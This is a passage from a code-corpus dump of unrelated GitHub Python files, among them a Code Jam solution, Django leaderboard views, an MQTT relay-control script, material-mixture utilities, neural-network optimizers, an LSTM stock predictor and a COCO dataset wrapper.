n\n n_b = 0\n i_q = 1\n i_same_reverse = [-1, -1]\n found_ind = False\n while i_q < 150 and n_b < n:\n if i_q % 10 == 1 and n_b > 0:\n # check and get new res\n compl = swap = compl_swap = same = True\n for ic in i_same_reverse:\n if ic >= 0:\n i_q, b = inter(i_q, ic)\n if res[ic] == b:\n compl = False\n else:\n same = False\n if res[n - 1 - ic] == b:\n compl_swap = False\n else:\n swap = False\n if (log):\n print(same, compl , swap , compl_swap , file=log_file)\n print('before',*res, file=log_file)\n if not same:\n if compl or compl_swap:\n for k in range(n_b ):\n i_k = get_bit_index(n, k)\n res[i_k] = 1 - res[i_k]\n if (log):\n print('compl ',*res, file=log_file)\n if found_ind and (swap or compl_swap):\n for k in range(0, (n_b ), 2):\n i_k = get_bit_index(n, k)\n res[i_k], res[n - 1 - i_k] = res[n - 1 - i_k], res[i_k]\n if (log):\n print('swap ',*res, file=log_file)\n if n_b&1 and (swap or compl_swap): n_b-=1\n\n i_b = get_bit_index(n, n_b)\n # if log: print(n,n_b, i_b, n_b & 1, bool(n_b & 1), n_b - 1, (n_b - 1) >> 1, n - 1 - ((n_b - 1) >> 1))\n i_q, b = inter(i_q, i_b)\n if b == -1: return -1\n res[i_b] = b\n if not found_ind and n_b & 1:\n if res[i_b] == res[n - 1 - i_b]:\n if i_same_reverse[0] == -1:\n i_same_reverse[0] = n - 1 - i_b\n if i_same_reverse[1] != -1: found_ind = True\n else:\n if i_same_reverse[1] == -1:\n i_same_reverse[1] = n - 1 - i_b\n if i_same_reverse[0] != -1: found_ind = True\n n_b += 1\n\n\n return res\n\n\ndef inp():\n if log:\n global log_file\n log_file = open('c:\\\\my\\\\log_sol.txt', \"w\")\n # print(log_file)\n t, n = (int(s) for s in input().split(\" \"))\n for i in range(1, t + 1):\n res = algo(n)\n if (log):\n print(*res, sep='', flush=True, file=log_file)\n if res == -1: break\n print(*res, sep='', flush=True)\n ok = input()\n if ok == 'N': break\n if log: log_file.close()\n\n\nif __name__ == '__main__':\n inp()\n","repo_name":"tivrfoa/codejam","sub_path":"2020/qualification-round/d/AndDziurak-d.py","file_name":"AndDziurak-d.py","file_ext":"py","file_size_in_byte":3065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"4253171213","text":"from django.shortcuts import render\nfrom core.models import Streak, Profile\nfrom django.contrib.auth.decorators import login_required\n\nfrom .models import CoinsEarnerLeaderBoard, CreatorLeaderBoard, ReferralLeaderBoard\n# Create your views here.\n\n\n\"\"\"\nAdd Pagination To All The Leaderboard\n\nAnd also make all the leaderboard daily\n\"\"\"\n\n\n\n\n# @login_required(redirect_field_name='next', login_url='account_login')\ndef LeaderboardView(request):\n user = request.user\n profile = None\n if user.is_authenticated:\n profile = Profile.objects.get(user=user)\n context={\n 'nav': 'leaderboard',\n 'profile': profile,\n }\n return render(request, 'leaderboard/leaderboard.html', context)\n\n\n\n\n@login_required(redirect_field_name='next', login_url='account_login')\ndef StreakLeaderBoardView(request):\n user = request.user\n profile = user.profile\n instance = Streak.objects.get(profile=profile)\n leaders = Streak.objects.all().order_by('-length', '-question')[0:100]\n index = (*leaders,).index(instance) + 1 or \"1000+\"\n # add the get absolute url function to the profile\n # add pagination and waypoint or ajax I think Ajax will be more controllable\n # index = 1\n context = {\n 'leaders': leaders,\n 'index': index,\n 'instance' : instance,\n }\n\n return render(request, 'leaderboard/streak.html', context)\n\n\n# add the function for reward that will be triggered by celery. it wont't be a view function\n\n\n\n@login_required(redirect_field_name='next', login_url='account_login')\ndef WealthLeaderBoardView(request,*args, **kwargs):\n user = request.user\n instance = CoinsEarnerLeaderBoard.objects.get(leader=user)\n leaders = CoinsEarnerLeaderBoard.objects.all().order_by('-coins')[0:100]\n index = (*leaders,).index(instance) + 1 or \"1000+\"\n context = {\n 'leaders' : leaders,\n 'index': index,\n 'instance' : instance,\n }\n\n return render(request, 'leaderboard/wealth.html', context)\n\n\n\n\n@login_required(redirect_field_name='next', login_url='account_login')\ndef CreatorsLeaderBoardView(request,*args, **kwargs):\n user = request.user\n instance = CreatorLeaderBoard.objects.get(leader=user)\n leaders = CreatorLeaderBoard.objects.all().order_by('-coins')[0:100]\n index = (*leaders,).index(instance) + 1 or \"1000+\"\n\n context = {\n 'leaders' : leaders,\n 'index': index,\n 'instance' : instance,\n }\n\n return render(request, 'leaderboard/wealth.html', context)\n\n\n\n\n@login_required(redirect_field_name='next', login_url='account_login')\ndef ReferralLeaderBoardView(request,*args, **kwargs):\n user = request.user\n leaders = ReferralLeaderBoard.objects.all().order_by('-refers')[0:100]\n instance = ReferralLeaderBoard.objects.get(leader=user)\n\n index = (*leaders,).index(instance) + 1 or \"1000+\"\n\n context = {\n 'leaders' : leaders,\n 'index': index,\n 'instance' : instance,\n }\n\n return render(request, 'leaderboard/referral.html', context)\n\n\n\n\ndef referrals(request):\n user = request.user\n if user.is_authenticated:\n instance = user.profile\n else:\n instance = user\n leaders = Profile.objects.all().order_by(\"-refercount\")[:100]\n # index = (*leaders,).index(instance) + 1 or \"100+\"\n\n context = {\n \"leaders\": leaders,\n # \"index\": index,\n 'instance': instance,\n }\n return render(request, 'leaderboard/referral.html', context)\n","repo_name":"PeaceTem/tothex","sub_path":"leaderboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"3705460421","text":"\"\"\"Flask configuration.\"\"\"\nfrom os import environ, path\nfrom dotenv import load_dotenv\n\nbasedir = path.abspath(path.dirname(__file__))\n\nTESTING = True\nDEBUG = True\nFLASK_ENV = 'development'\nSTATIC_FOLDER = 'static'\nTEMPLATES_FOLDER = 'templates'","repo_name":"tj-oconnor/spaceheroes_ctf","sub_path":"web/web-spacebuds/src/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"6"} +{"seq_id":"35665568316","text":"import paho.mqtt.client as mqtt\nimport time\nimport random\nfrom mqtt_init import *\n\n\n# broker IP adress:\nbroker=broker_ip\nrunning_time = 30 # in sec\nport=broker_port # for using web sockets\nglobal ON\nON=False\nTRH = 22.4\n\ndef on_log(client, userdata, level, buf):\n print(\"log: \"+buf)\ndef on_connect(client, userdata, flags, rc):\n if rc==0:\n print(\"connected OK\")\n else:\n print(\"Bad connection Returned code=\",rc)\ndef on_disconnect(client, userdata, flags, rc=0):\n print(\"DisConnected result code \"+str(rc))\ndef on_message(client,userdata,msg):\n global ON\n topic=msg.topic\n m_decode=str(msg.payload.decode(\"utf-8\",\"ignore\"))\n print(\"message received\",m_decode)\n #if 'HUMIDITY' not in m_decode:\n ON=msg_parse(m_decode)\n send_msg(client)\n\ndef msg_parse(m_decode):\n print(m_decode) \n rez=float(m_decode.split('Temperature: ')[1].split(' Humidity:')[0])\n #{\"addr\":0, \"cname\":\"LDR\", \"value\":1017}\n #{\"addr\":0, \"cname\":\"TEMPERATURE\", \"value\":32.00}\n # Temperature: 22.1 Humidity: 76.2\n if rez>TRH:\n return True\n return False\n\ndef send_msg(client):\n global ON\n # Following is an example for code turning a Relay device 'On':\n device_ID = \"3PI_22559442/sts\"\n # client.publish(\"matzi/0/3PI_22559442/sts\", ' {\"type\":\"set_state\", \"action\":\"set_value\", \"addr\":0, \"cname\":\"ONOFF\", \"value\":1}') \n if ON:\n client.publish(\"matzi/0/\"+device_ID, ' {\"type\":\"set_state\", \"action\":\"set_value\", \"addr\":0, \"cname\":\"ONOFF\", \"value\":1}') \n else:\n # and consequently 'OFF':\n client.publish(\"matzi/0/\"+device_ID, ' {\"type\":\"set_state\", \"action\":\"set_value\", \"addr\":0, \"cname\":\"ONOFF\", \"value\":0}')\n \n\nr=random.randrange(1,10000) # for creating unique client ID\nclientname=\"IOT_test-\"+str(r)\nclient = mqtt.Client(clientname, clean_session=True) # create new client instance\n\nclient.on_connect=on_connect #bind call back function\nclient.on_disconnect=on_disconnect\n#client.on_log=on_log\nclient.on_message=on_message\nclient.username_pw_set(username=username,password=password)\n\n\nprint(\"Connecting to broker \",broker)\nclient.connect(broker,int(port)) #connect to broker\n\n\n# Next loop will publishing all messages during running time\nclient.loop_start()\nclient.publish('testtopic/778',\"test1\")\n#client.subscribe(\"matzi/0/3PI_16145805/sts\") # button ID\n#client.subscribe(\"matzi/0/3PI_11310380/sts\") # REED ID\n#client.subscribe(\"matzi/0/3PI_3380731/sts\") # Light ID\nclient.subscribe('testtopic/778') # DTH ID\n\n#client.subscribe(\"matzi/#\")\ntime.sleep(running_time)\nclient.loop_stop()\nclient.disconnect() # disconnect\nprint(\"End of script run\")\n\n","repo_name":"yuryyu/IOT20","sub_path":"cubes_test.py","file_name":"cubes_test.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"24793890163","text":"# enable 'from mctools import *'\n__all__ = [\"common\", \"fluka\", \"mcnp\", \"phits\" ]\n\nimport subprocess, os, sys\nfrom math import sqrt\n\ndef L2E(l, m=1.674927351e-27): #constants.physical_constants['neutron mass'][0]):\n \"\"\"\n Angstrom to MeV converter.\n m = particle mass in kg.\n \"\"\"\n l = l*1.0E-10 # Angstrom -> meter\n e = 1.602176565e-19 # constants.physical_constants['atomic unit of charge'][0]\n h = 6.62606957e-34 # constants.physical_constants['Planck constant'][0]\n p = h/l\n energy = p*p/(2*m)\n return energy/e/1.0E+6\n\ndef E2L(energy, m=1.674927351e-27): #constants.physical_constants['neutron mass'][0]):\n \"\"\"\n MeV to Angstrom converter\n m = particle mass in kg\n \"\"\"\n e = 1.602176565e-19 # constants.physical_constants['atomic unit of charge'][0]\n h = 6.62606957e-34 # constants.physical_constants['Planck constant'][0]\n l = h/sqrt(2*m*energy*e)*1.0E+7\n return l\n\n\ndef GetVariable(f, var):\n \"\"\"\n Return the variable value from the CombLayer-generated xml file\n \"\"\"\n p = subprocess.Popen(\"getvariable %s %s\" % (f, var), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n output, error = p.communicate()\n return output\n\ndef checkPaths(dirs, files, verbose=True):\n \"\"\"\n Checks if folders/files exist\n \"\"\"\n for d in dirs:\n if not os.path.isdir(d):\n if verbose:\n print(d, \"does not exist\", file=sys.stderr)\n return 1\n\n for f in files:\n if not os.path.isfile(f):\n print(f, \"does not exist\", file=sys.stderr)\n return 2\n return 0\n\n\n### MIXTURES ###\n\nclass Compound:\n \"\"\" Compound is a mixture of materials with given volume fractions \"\"\"\n def __init__(self, name):\n self.name = name\n self.materials = []\n self.vf = [] # volume fractions of corresponding materials\n\n def AddMaterial(self, m, vf):\n \"\"\" Adds material m with given volume fraction vf \"\"\"\n self.materials.append(m)\n self.vf.append(vf)\n\n def GetDensity(self):\n \"\"\" Return density of compound \"\"\"\n rho = 0.0\n for j,m in enumerate(self.materials):\n rho += m.density*self.vf[j]\n return rho\n\n def GetMassFraction(self, material):\n \"\"\" Return mass fraction of the given material \"\"\"\n mf = None\n for im, m in enumerate(self.materials):\n if m == material:\n mf = m.density*self.vf[im]/self.GetDensity()\n if mf == None:\n raise IOError(\"Compound %s does not contain material %s\" % (self.name, material.name))\n return mf\n\n\n def GetAtomicFractions(self):\n \"\"\" Calculates mass fractions \"\"\"\n vf = [] # volume fractions of isotopes\n mf = [] # mass fractions of isotopes\n af = [] # atomic fractions of isotopes\n iname = [] # isotope names\n for im,m in enumerate(self.materials):\n for ii, i in enumerate(m.isotopes):\n curvf = m.GetVolumeFraction(i)*self.vf[im] # current volume fraction\n vf.append(curvf)\n curmf = self.GetMassFraction(m)*i.A*m.nn[ii]/m.GetA() # current mass fraction\n mf.append(curmf)\n af.append(curmf/i.A)\n iname.append(i.name)\n\n # normalisation:\n s = sum(af)\n for i,v in enumerate(af):\n af[i] = v/s\n\n return dict(list(zip(iname, af)))\n\n def PrintAtomicFractions(self):\n for i,f in sorted(self.GetAtomicFractions().items()):\n print(i,f)\n print(\"Density: \", -self.GetDensity())\n\n def Print(self):\n print(\"Compound:\", self.name)\n print(\" Density:\", self.GetDensity())\n for j,m in enumerate(self.materials):\n print(\"\", self.vf[j], \"%\")\n m.Print()\n print(\" Mass fractions:\")\n self.GetAtomicFractions()\n\nclass Material:\n \"\"\" Material is made of isotopes \"\"\"\n def __init__(self, name, density):\n self.name = name\n self.isotopes = []\n self.nn = [] # number of corresponding isotopes\n self.density = density\n\n def AddIsotope(self, i, n=1):\n self.isotopes.append(i)\n self.nn.append(n)\n\n def GetA(self):\n \"\"\" Return atomic weight \"\"\"\n s = 0.0;\n for j,i in enumerate(self.isotopes):\n s += self.nn[j]*i.A;\n return s\n\n def GetVolumeFraction(self, isotope):\n \"\"\" Return volume fraction of the given isotope \"\"\"\n vf = None\n for j,i in enumerate(self.isotopes):\n if i == isotope:\n vf = self.nn[j]/sum(self.nn)\n if vf == None:\n raise IOError(\"Material %s does not have isotope %s\" % (self.name, isotope.name))\n return vf\n\n def Print(self):\n print(\" Material:\", self.name)\n print(\" Density:\", self.density)\n print(\" Atomic weight: \", self.GetA(), \"g/mole\")\n print(\" Isotopes:\")\n for j,i in enumerate(self.isotopes):\n# print(\" \"*2, self.nn[j], end='')\n i.Print()\n print(\" Volume fraction in %s: %g\" % (self.name, self.GetVolumeFraction(i)))\n\nclass Isotope:\n \"\"\" Isotopes form material \"\"\"\n def __init__(self, name, A):\n self.name = name\n self.A = A # atomic weight\n\n def Print(self):\n print(\"\\t%s \\t A = %g\" % (self.name, self.A))\n\n### END MIXTURES ###\n","repo_name":"kbat/mc-tools","sub_path":"mctools/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5379,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"6"} +{"seq_id":"28244406963","text":"#coding=utf-8\nfrom appium import webdriver\nimport time, os, re\n\nplatformVersion = os.popen('adb shell getprop ro.build.version.release').read()\n# 读取设备 id\nreadDeviceId = list(os.popen('adb devices').readlines())\n# 正则表达式匹配出 id 信息\ndeviceId = re.findall(r'^\\w*\\b', readDeviceId[1])[0]\n\ndesired_caps = {\n 'platformName': 'Android',\n 'platformVersion': platformVersion,\n 'deviceName': deviceId,\n 'appPackage': 'io.newtype.eddid.app',\n 'appActivity': 'com.bartech.app.main.launcher.LauncherActivity',\n # 'unicodeKeyboard': True,\n # 'resetKeyboard': True\n}\n\ndriver = webdriver.Remote('http://127.0.0.1:4723/wd/hub', desired_caps)\n\n# driver.find_element_by_id(\"digit_1\").click()\n\n# driver.find_element_by_id(\"op_add\").click()\n\n# driver.find_element_by_id(\"digit_2\").click()\n\n# driver.find_element_by_id(\"eq\").click()\ntime.sleep(10)\n\ndriver.quit()","repo_name":"sevencrime/Python_Demo","sub_path":"Android_Demo/55.py","file_name":"55.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"75188754426","text":"T = int(input())\nfor test_case in range(1, T+1):\n word = input()\n stack = []\n\n for char in word: # 모든 문자열을 stack에 넣어주는 과정에서\n if stack: # stack이 빈 상태가 아니라면\n if char == stack[-1]: # stack에 가장 최근 들어간 문자와 같다면 (연속된 것이므로)\n stack.pop() # 제거해준다\n else: # stack에 가장 최근 들어간 문자와 같지 않다면 (연속되지 않은 것이므로)\n stack.append(char) # 넣어준다\n else: # stack이 빈 상태라면\n stack.append(char) # 넣어준다\n\n ans = len(stack)\n print(f'#{test_case} {ans}')\n\n# 아래는 처음 풀었던 풀이\n# 1) stack[-1]로 접근한 점은 좋았다\n# 2) 어차피 문자열 역시 하나의 list이므로 chars = list(word)는 굳이 불필요하다\n# 3) if stack: 을 통해 stack이 빈 상태가 아니라면 이라는 조건이 필요하다\n# 3-1) 이런 조건을 걸면 자연스레 index error를 방지하고자 stack 맨 앞에 0을 넣고, stack[1:]을 출력할 필요도 없다\n\n'''\nT = int(input())\nfor test_case in range(1, T+1):\n word = input()\n chars = list(word)\n stack = [0] # index error 방지\n\n for i in range(len(chars)): # 모든 문자열을 stack에 넣어주는 과정에서\n if chars[i] != stack[-1]: # stack에 가장 최근 들어간 문자와 같지 않다면 (연속되지 않은 것이므로)\n stack.append(chars[i]) # 넣어준다\n else: # stack에 가장 최근 들어간 문자와 같다면 (연속된 것이므로)\n stack.pop() # 제거해준다\n\n ans = len(stack[1:]) # index error 방지용으로 넣었던 0을 뺀 원소의 수\n print(f'#{test_case} {ans}')\n'''\n","repo_name":"zacinthepark/Problem-Solving-Notes","sub_path":"swea/0818_반복문자지우기.py","file_name":"0818_반복문자지우기.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"17248515544","text":"# Code from here: https://github.com/albermax/innvestigate/blob/master/examples/notebooks/imagenet_compare_methods.ipynb\nimport keras\nimport keras.backend\nimport imp\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport innvestigate\nimport innvestigate.utils\nimport keras.applications.vgg16 as vgg16\nfrom keras.applications.vgg16 import decode_predictions\n\nmodel, preprocess = vgg16.VGG16(), vgg16.preprocess_input\nbase_dir = os.path.dirname(__file__)\nutils = imp.load_source(\"utils\", os.path.join(base_dir, \"utils.py\"))\nimgnetutils = imp.load_source(\"utils_imagenet\", \"utils_imagenet.py\")\n\ndef inverse_graymap(X):\n return imgnetutils.graymap(np.max(X) - X)\n\n\n# Methods we use and some properties.\nmethods = [\n# NAME OPT.PARAMS POSTPROC FXN TITLE\n# Show input.\n(\"input\", {}, imgnetutils.image, \"Input\"),\n# Function\n(\"gradient\", {\"postprocess\": \"abs\"}, inverse_graymap, \"Gradient\"),\n(\"smoothgrad\", {\"augment_by_n\": 64, \"postprocess\": \"square\"}, inverse_graymap, \"SmoothGrad\"),\n# Signal\n#(\"deconvnet\", {}, imgnetutils.bk_proj, \"Deconvnet\"),\n#(\"guided_backprop\", {}, imgnetutils.bk_proj, \"Guided Backprop\"),\n#(\"pattern.net\", {}, imgnetutils.bk_proj, \"PatternNet\"),\n# Interaction\n#(\"deep_taylor\", {}, imgnetutils.heatmap, \"Deep Taylor\"),\n#(\"pattern.attribution\", {}, imgnetutils.heatmap, \"PatternAttribution\"),\n#(\"input_t_gradient\", {}, imgnetutils.heatmap, \"Input * Gradient\"),\n#(\"integrated_gradients\", {\"steps\": 64}, imgnetutils.heatmap, \"Integrated Gradients\"),\n#(\"lrp.z\", {}, imgnetutils.heatmap, \"LRP-Z\"),\n#(\"lrp.epsilon\", {\"epsilon\": 1}, imgnetutils.heatmap, \"LRP-Epsilon\"),\n#(\"lrp.sequential_preset_a_flat\",{\"epsilon\": 1}, imgnetutils.heatmap, \"LRP-PresetAFlat\"),\n#(\"lrp.sequential_preset_b_flat\",{\"epsilon\": 1}, imgnetutils.heatmap, \"LRP-PresetBFlat\"),\n]\n\nif __name__ == \"__main__\":\n # Load an image.\n image = utils.load_image(\n os.path.join(base_dir, \"..\", \"..\", \"manuscript\", \"images\", \"dog_and_book.jpeg\"), 224)\n\n # Get model\n yhat = model.predict(preprocess(image[None]))\n label = decode_predictions(yhat)\n label = label[0][0]\n print('%s (%.2f%%)' % (label[1], label[2]*100))\n # Strip softmax layer\n model = innvestigate.utils.model_wo_softmax(model)\n for method in methods:\n print(method[0])\n analyzer = innvestigate.create_analyzer(method[0],\n model,\n **method[1])\n if method[0] == \"input\":\n a = image[None]\n a = (a - a.min())/ (a.max() - a.min())\n else:\n x = preprocess(image[None])\n # use preprocessing from other script\n a = analyzer.analyze(x)\n a = imgnetutils.postprocess(a, \"BGRtoRGB\", False)\n a = method[2](a)\n plt.imshow(a[0], cmap=\"seismic\", clim=(-1, 1))\n plt.axis('off')\n plt.title(method[3])\n plt.savefig(\"dog_and_book_\" + method[0] + \".png\", bbox_inches = \"tight\")\n\n","repo_name":"christophM/interpretable-ml-book","sub_path":"scripts/dl-feature-attribution/feature-attribution-dl.py","file_name":"feature-attribution-dl.py","file_ext":"py","file_size_in_byte":3311,"program_lang":"python","lang":"en","doc_type":"code","stars":4584,"dataset":"github-code","pt":"6"} +{"seq_id":"24764655241","text":"# -*- coding: utf-8 -*- \nimport numpy as np \n \nclass Optimizer(object): \n '''Optimizer base class\\n \n ''' \n def __init__(self, parameters, lr): \n self.params = parameters \n self.lr = lr \n \n def step(self): \n raise NotImplementedError \n \nclass SGD(Optimizer): \n '''Stochastic Gradient Descent\\n \n \n Args: \n parameters (OrderedDict): parameters stored in a Module \n lr (float): learning rate \n \n Attributes: \n params (generator): generator named params in Module class \n lr (float): learning rate \n ''' \n def __init__(self, parameters, lr=0.001): \n super().__init__(parameters, lr) \n \n def step(self): \n for i in self.params(): \n i.data -= self.lr * i.grad \n \nclass Momentum(Optimizer): \n '''Momentum SGD\\n \n \n Args: \n parameters (OrderedDict): parameters stored in a Module \n lr (float): learning rate \n momentum (float): momentum \n \n Attributes: \n params (generator): generator named params in Module class \n lr (float): learning rate \n momentum (float): momentum \n velocity (dict): stores velocities for each parameter \n ''' \n def __init__(self, parameters, lr=0.001, momentum=0.9): \n super().__init__(parameters, lr) \n self.momentum = momentum \n self.velocity = {} \n \n def step(self): \n for i, var in enumerate(self.params()): \n if i not in self.velocity: \n self.velocity[i] = np.zeros_like(var.grad) \n self.velocity[i] = self.momentum * self.velocity[i] + (1 - self.momentum) * var.grad \n var.data -= self.lr * self.velocity[i] \n \nclass AdaGrad(Optimizer): \n '''Adaptive Subgradient\\n \n Adagrad is an optimizer with parameter-specific learning rates, which are adapted relative to how frequently a parameter gets updated during training. \n The more updates a parameter receives, the smaller the updates. \n \n Args: \n parameters (OrderedDict): parameters stored in a Module \n lr (float): learning rate \n eps (float): constant that stablizes the calculation \n \n Attributes: \n params (generator): generator named params in Module class \n lr (float): learning rate \n eps (float): constant \n h (dict): stores adoptive term \n ''' \n def __init__(self, parameters, lr=0.001, eps=1e-8): \n super().__init__(parameters, lr) \n self.eps = eps \n self.h = {} \n \n def step(self): \n for i, var in enumerate(self.params()): \n if i not in self.h: \n self.h[i] = np.zeros_like(var.grad) \n self.h[i] += var.grad * var.grad \n var.data -= self.lr * var.grad / np.sqrt(self.h[i]+self.eps) \n \nclass Adadelta(Optimizer): \n '''ADADELTA\\n \n This method dynamically adapts over time using only first order information and has minimal computational overhead beyond vanilla stochastic gradient descent. \n \n Args: \n parameters (OrderedDict): parameters stored in a Module \n lr (float): learning rate \n decay_rate (float): decay rate \n eps (float): constant that stablizes the calculation \n \n Attributes: \n params (generator): generator named params in Module class \n gamma (float): decay rate \n eps (float): constant \n g (dict): accumulate grads \n u (dict): accumulate updates \n \n Reference: \n https://arxiv.org/pdf/1212.5701.pdf \n ''' \n def __init__(self, parameters, decay_rate=0.95, eps=1e-6): \n super().__init__(parameters, None) \n self.rho = decay_rate \n self.eps = eps \n self.g = {} \n self.u = {} \n \n def step(self): \n for i, var in enumerate(self.params()): \n if i not in self.g: \n self.g[i] = np.zeros_like(var.grad) \n if i not in self.u: \n self.u[i] = np.zeros_like(var.grad) \n self.g[i] = self.rho * self.g[i] + (1-self.rho) * var.grad**2 \n update = -np.sqrt(self.u[i]+self.eps) * var.grad / np.sqrt(self.g[i]+self.eps) \n self.u[i] = self.rho * self.u[i] + (1-self.rho) * update**2 \n var.data += update \n \nclass RMSProp(Optimizer): \n '''RMSProp\\n \n This optimizer is usually a good choice for recurrent neural networks. \n \n Args: \n parameters (OrderedDict): parameters stored in a Module \n lr (float): learning rate \n decay_rate (float): forgets past gradients at rate of this \n eps (float): \n \n Attributes: \n params (generator): generator named params in Module class \n lr (float): learning rate \n gamma (float): forgets past gradients at rate of this \n eps (float): \n h (dict): stores adoptive term \n ''' \n def __init__(self, parameters, lr=0.001, decay_rate=0.99, eps=1e-8): \n super().__init__(parameters, lr) \n self.gamma = decay_rate \n self.eps = eps \n self.h = {} \n \n def step(self): \n for i, var in enumerate(self.params()): \n if i not in self.h: \n self.h[i] = np.zeros_like(var.grad) \n self.h[i] = self.gamma * self.h[i] + (1-self.gamma) * var.grad**2 \n var.data -= self.lr * var.grad / np.sqrt(self.h[i]+self.eps) \n","repo_name":"Kashu7100/Qualia","sub_path":"qualia/optim.py","file_name":"optim.py","file_ext":"py","file_size_in_byte":5340,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"6"} +{"seq_id":"36008142459","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sklearn as sklearn\nimport tensorflow as tensorflow\nfrom sklearn.preprocessing import MinMaxScaler\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import LSTM, Dense\n\n# from google.colab import drive\n# drive.mount('/content/drive')\n\n# ls drive/MyDrive/Personal/LSTM/stock_trading_data.csv\n\n# Load the sample data\ndata = pd.read_csv('./stock_trading_data.csv')\n\n\n#print(data.info())\n\ndata.loc[[0, 2, 3]]\n\n# Extract the 'Close' price\nclose_prices = data['Close'].values.reshape(-1, 1)\n# Normalize the data between 0 and 1\nscaler = MinMaxScaler()\nclose_prices_scaled = scaler.fit_transform(close_prices)\n\n# Prepare the data for the LSTM model\nsequence_length = 10\nX, y = [], []\nfor i in range(len(close_prices_scaled) - sequence_length):\n X.append(close_prices_scaled[i:i + sequence_length])\n y.append(close_prices_scaled[i + sequence_length])\nX, y = np.array(X), np.array(y)\n\n# Split the data into training and testing sets\nsplit_ratio = 0.8\nsplit_index = int(split_ratio * len(X))\nX_train, X_test = X[:split_index], X[split_index:]\ny_train, y_test = y[:split_index], y[split_index:]\n\n\n# Build the LSTM model\nmodel = Sequential()\nmodel.add(LSTM(units=100, return_sequences=True, input_shape=(sequence_length, 1)))\nmodel.add(LSTM(units=150))\nmodel.add(Dense(units=1))\n\n\nmodel.compile(optimizer='adam', loss='mean_squared_error')\n\n# Train the model\nmodel.fit(X_train, y_train, epochs=100, batch_size=32)\n\n# Evaluate the model\nloss = model.evaluate(X_test, y_test)\nprint(f\"Test loss: {loss}\")\n\n\ny_pred = model.predict(X_test)\n\ny_pred = scaler.inverse_transform(y_pred)\ny_test = scaler.inverse_transform(y_test)\n\n#save model\nmodel.save('drive/MyDrive/Personal/LSTM/Stock_Price_model')\n\nprint(f\"Test loss: {loss}\")\n\n# Plot the predictions against the true values\nplt.plot(y_test[:], label='True Prices')\nplt.plot(y_pred, label='Predicted Prices')\nplt.legend()\nplt.show()\n","repo_name":"Tundeh/LSTM","sub_path":"stock_price_prediction.py","file_name":"stock_price_prediction.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"8068218051","text":"\"\"\"Modified detection dataset that can be pickled. See links below for more info\nhttps://github.com/pytorch/vision/issues/6753#:~:text=The%20transforms%20v2%20API%20looks%20very%20nice\nhttps://github.com/pytorch/vision/pull/7860\n\"\"\"\nfrom typing import Any, Tuple, Callable, Optional, List\n\nimport torch\nfrom pycocotools import mask\nfrom torchvision import datapoints\nimport logging\nfrom torchvision.datapoints._dataset_wrapper import (\n list_of_dicts_to_dict_of_lists,\n)\nfrom torchvision.datasets import CocoDetection\nfrom torchvision.transforms.v2 import functional as F\n\n\nclass CocoDetectionV2(CocoDetection):\n def __init__(\n self,\n root: str,\n annFile: str,\n transforms: Callable[..., Any] | None = None,\n no_add_ids: Optional[List[int]] = None,\n ) -> None:\n self.__logger = logging.getLogger(__name__)\n super().__init__(root, annFile)\n self.v2_transforms = transforms\n self.__logger.info(\n f\"COCO dataset size before removal of missing anns {len(self.ids)}\"\n )\n valid_ids = [id for id in self.ids if id not in no_add_ids]\n self.ids = valid_ids\n self.__logger.info(\n f\"COCO dataset size after removal of missing anns: {len(self.ids)}\"\n )\n self.no_add_ids = no_add_ids\n\n def __getitem__(self, index: int) -> Tuple[Any, Any]:\n sample = super().__getitem__(index)\n sample = self.wrapper(index, sample)\n if self.v2_transforms is not None:\n sample = self.v2_transforms(*sample)\n return sample\n\n def segmentation_to_mask(self, segmentation, *, spatial_size):\n \"\"\"Copied from `torchvision/datapoints/_dataset_wrapper.py`\"\"\"\n\n segmentation = (\n mask.frPyObjects(segmentation, *spatial_size)\n if isinstance(segmentation, dict)\n else mask.merge(mask.frPyObjects(segmentation, *spatial_size))\n )\n return torch.from_numpy(mask.decode(segmentation))\n\n def wrapper(self, idx, sample):\n \"\"\"Copied from `torchvision/datapoints/_dataset_wrapper.py`\"\"\"\n image_id = self.ids[idx]\n\n image, target = sample\n\n if not target:\n return image, dict(image_id=image_id)\n\n batched_target = list_of_dicts_to_dict_of_lists(target)\n\n batched_target[\"image_id\"] = image_id\n\n spatial_size = tuple(F.get_spatial_size(image))\n batched_target[\"boxes\"] = F.convert_format_bounding_box(\n datapoints.BoundingBox(\n batched_target[\"bbox\"],\n format=datapoints.BoundingBoxFormat.XYWH,\n spatial_size=spatial_size,\n ),\n new_format=datapoints.BoundingBoxFormat.XYXY,\n )\n batched_target[\"masks\"] = datapoints.Mask(\n torch.stack(\n [\n self.segmentation_to_mask(\n segmentation, spatial_size=spatial_size\n )\n for segmentation in batched_target[\"segmentation\"]\n ]\n ),\n )\n batched_target[\"labels\"] = torch.tensor(batched_target[\"category_id\"])\n return image, batched_target\n\n\ndef collate(batch):\n return tuple(zip(*batch))\n","repo_name":"calgaryml/condensed-sparsity","sub_path":"src/rigl_torch/datasets/_coco_detection_v2.py","file_name":"_coco_detection_v2.py","file_ext":"py","file_size_in_byte":3232,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"6"} +{"seq_id":"3527414662","text":"# -*- coding: utf-8 